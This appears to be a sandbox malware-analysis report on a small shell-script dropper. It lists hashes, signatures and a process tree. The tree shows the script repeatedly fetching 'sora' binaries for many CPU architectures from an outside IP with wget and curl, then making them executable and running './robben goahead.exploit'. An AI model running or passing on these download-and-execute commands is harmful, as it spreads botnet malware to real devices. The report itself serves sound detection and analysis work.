Analysis
  max time kernel:   3s
  max time network:  132s
  platform:          ubuntu-18.04_amd64
  resource:          ubuntu1804-amd64-20240611-en
  resource tags:     arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
  submitted:         18/10/2024, 02:43
Static task
  static1

Behavioral task
  behavioral1
    Sample:   c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh
    Resource: ubuntu1804-amd64-20240611-en
  behavioral2
    Sample:   c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh
    Resource: debian9-armhf-20240611-en
  behavioral3
    Sample:   c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh
    Resource: debian9-mipsbe-20240611-en
  behavioral4
    Sample:   c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh
    Resource: debian9-mipsel-20240729-en
General
  Target: c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh
  Size:   2KB
  MD5:    ee0d49be644dae49f775256609f1218e
  SHA1:   036f36cd4a7dc0abe7ea6315e9f2524f35a6c73d
  SHA256: c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2
  SHA512: 1df66cf2794390f84d3c0e20e24991c720c852c38a3b1984e8c120d1310f492ffad43ae4248e72cbd00968ec4a3db753f4a748147ac2295ad7a83f46146374c8
Malware Config

Signatures

File and Directory Permissions Modification (1 TTP, 14 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  pid   Process
  1512  chmod
  1567  chmod
  1573  chmod
  1500  chmod
  1506  chmod
  1549  chmod
  1555  chmod
  1561  chmod
  1491  chmod
  1537  chmod
  1543  chmod
  1519  chmod
  1525  chmod
  1531  chmod

Executes dropped EXE (14 IoCs)
  ioc          pid   Process
  /tmp/robben  1492  robben
  /tmp/robben  1501  robben
  /tmp/robben  1507  robben
  /tmp/robben  1513  robben
  /tmp/robben  1520  robben
  /tmp/robben  1526  robben
  /tmp/robben  1532  robben
  /tmp/robben  1538  robben
  /tmp/robben  1544  robben
  /tmp/robben  1550  robben
  /tmp/robben  1556  robben
  /tmp/robben  1562  robben
  /tmp/robben  1568  robben
  /tmp/robben  1574  robben

System Network Configuration Discovery (1 TTP, 3 IoCs)
  Adversaries may gather information about the network configuration of a system.
  pid   Process
  1494  wget
  1495  curl
  1499  cat

Writes file to tmp directory (1 IoC)
  Malware often drops required files in the /tmp directory.
  description                   ioc          Process
  File opened for modification  /tmp/robben  c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh
Processes

/tmp/c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh  /tmp/c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh  (PID 1487)  [Writes file to tmp directory]
    /usr/bin/wget  wget http://93.123.85.141/bins/sora.x86  (PID 1488)
    /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.x86  (PID 1489)
    /bin/cat  cat sora.x86  (PID 1490)
    /bin/chmod  chmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh config-err-TtKvLo netplan_vobrtjej robben snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-h5vBj4  (PID 1491)  [File and Directory Permissions Modification]
    /tmp/robben  ./robben goahead.exploit  (PID 1492)  [Executes dropped EXE]

    /usr/bin/wget  wget http://93.123.85.141/bins/sora.mips  (PID 1494)  [System Network Configuration Discovery]
    /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.mips  (PID 1495)  [System Network Configuration Discovery]
    /bin/cat  cat sora.mips  (PID 1499)  [System Network Configuration Discovery]
    /bin/chmod  chmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh config-err-TtKvLo netplan_vobrtjej robben snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-h5vBj4  (PID 1500)  [File and Directory Permissions Modification]
    /tmp/robben  ./robben goahead.exploit  (PID 1501)  [Executes dropped EXE]

    /usr/bin/wget  wget http://93.123.85.141/bins/sora.x86_64  (PID 1503)
    /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.x86_64  (PID 1504)
    /bin/cat  cat sora.x86_64  (PID 1505)
    /bin/chmod  chmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh config-err-TtKvLo netplan_vobrtjej robben snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-h5vBj4  (PID 1506)  [File and Directory Permissions Modification]
    /tmp/robben  ./robben goahead.exploit  (PID 1507)  [Executes dropped EXE]

    /usr/bin/wget  wget http://93.123.85.141/bins/sora.i468  (PID 1509)
    /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.i468  (PID 1510)
    /bin/cat  cat sora.i468  (PID 1511)
    /bin/chmod  chmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh config-err-TtKvLo netplan_vobrtjej robben snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-h5vBj4  (PID 1512)  [File and Directory Permissions Modification]
    /tmp/robben  ./robben goahead.exploit  (PID 1513)  [Executes dropped EXE]

    /usr/bin/wget  wget http://93.123.85.141/bins/sora.i686  (PID 1515)
    /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.i686  (PID 1517)
    /bin/cat  cat sora.i686  (PID 1518)
    /bin/chmod  chmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh config-err-TtKvLo netplan_vobrtjej robben snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-h5vBj4  (PID 1519)  [File and Directory Permissions Modification]
    /tmp/robben  ./robben goahead.exploit  (PID 1520)  [Executes dropped EXE]

    /usr/bin/wget  wget http://93.123.85.141/bins/sora.mpsl  (PID 1522)
    /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.mpsl  (PID 1523)
    /bin/cat  cat sora.mpsl  (PID 1524)
    /bin/chmod  chmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh config-err-TtKvLo netplan_vobrtjej robben snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-h5vBj4  (PID 1525)  [File and Directory Permissions Modification]
    /tmp/robben  ./robben goahead.exploit  (PID 1526)  [Executes dropped EXE]

    /usr/bin/wget  wget http://93.123.85.141/bins/sora.arm4  (PID 1528)
    /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.arm4  (PID 1529)
    /bin/cat  cat sora.arm4  (PID 1530)
    /bin/chmod  chmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh config-err-TtKvLo netplan_vobrtjej robben snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-h5vBj4  (PID 1531)  [File and Directory Permissions Modification]
    /tmp/robben  ./robben goahead.exploit  (PID 1532)  [Executes dropped EXE]

    /usr/bin/wget  wget http://93.123.85.141/bins/sora.arm5  (PID 1534)
    /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.arm5  (PID 1535)
    /bin/cat  cat sora.arm5  (PID 1536)
    /bin/chmod  chmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh config-err-TtKvLo netplan_vobrtjej robben snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-h5vBj4  (PID 1537)  [File and Directory Permissions Modification]
    /tmp/robben  ./robben goahead.exploit  (PID 1538)  [Executes dropped EXE]

    /usr/bin/wget  wget http://93.123.85.141/bins/sora.arm6  (PID 1540)
    /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.arm6  (PID 1541)
    /bin/cat  cat sora.arm6  (PID 1542)
    /bin/chmod  chmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh config-err-TtKvLo netplan_vobrtjej robben snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-h5vBj4  (PID 1543)  [File and Directory Permissions Modification]
    /tmp/robben  ./robben goahead.exploit  (PID 1544)  [Executes dropped EXE]

    /usr/bin/wget  wget http://93.123.85.141/bins/sora.arm7  (PID 1546)
    /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.arm7  (PID 1547)
    /bin/cat  cat sora.arm7  (PID 1548)
    /bin/chmod  chmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh config-err-TtKvLo netplan_vobrtjej robben snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-h5vBj4  (PID 1549)  [File and Directory Permissions Modification]
    /tmp/robben  ./robben goahead.exploit  (PID 1550)  [Executes dropped EXE]

    /usr/bin/wget  wget http://93.123.85.141/bins/sora.ppc  (PID 1552)
    /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.ppc  (PID 1553)
    /bin/cat  cat sora.ppc  (PID 1554)
    /bin/chmod  chmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh config-err-TtKvLo netplan_vobrtjej robben snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-h5vBj4  (PID 1555)  [File and Directory Permissions Modification]
    /tmp/robben  ./robben goahead.exploit  (PID 1556)  [Executes dropped EXE]

    /usr/bin/wget  wget http://93.123.85.141/bins/sora.ppc440fp  (PID 1558)
    /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.ppc440fp  (PID 1559)
    /bin/cat  cat sora.ppc440fp  (PID 1560)
    /bin/chmod  chmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh config-err-TtKvLo netplan_vobrtjej robben snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-h5vBj4  (PID 1561)  [File and Directory Permissions Modification]
    /tmp/robben  ./robben goahead.exploit  (PID 1562)  [Executes dropped EXE]

    /usr/bin/wget  wget http://93.123.85.141/bins/sora.m68k  (PID 1564)
    /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.m68k  (PID 1565)
    /bin/cat  cat sora.m68k  (PID 1566)
    /bin/chmod  chmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh config-err-TtKvLo netplan_vobrtjej robben snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-h5vBj4  (PID 1567)  [File and Directory Permissions Modification]
    /tmp/robben  ./robben goahead.exploit  (PID 1568)  [Executes dropped EXE]

    /usr/bin/wget  wget http://93.123.85.141/bins/sora.sh4  (PID 1570)
    /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.sh4  (PID 1571)
    /bin/cat  cat sora.sh4  (PID 1572)
    /bin/chmod  chmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh config-err-TtKvLo netplan_vobrtjej robben snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-h5vBj4  (PID 1573)  [File and Directory Permissions Modification]
    /tmp/robben  ./robben goahead.exploit  (PID 1574)  [Executes dropped EXE]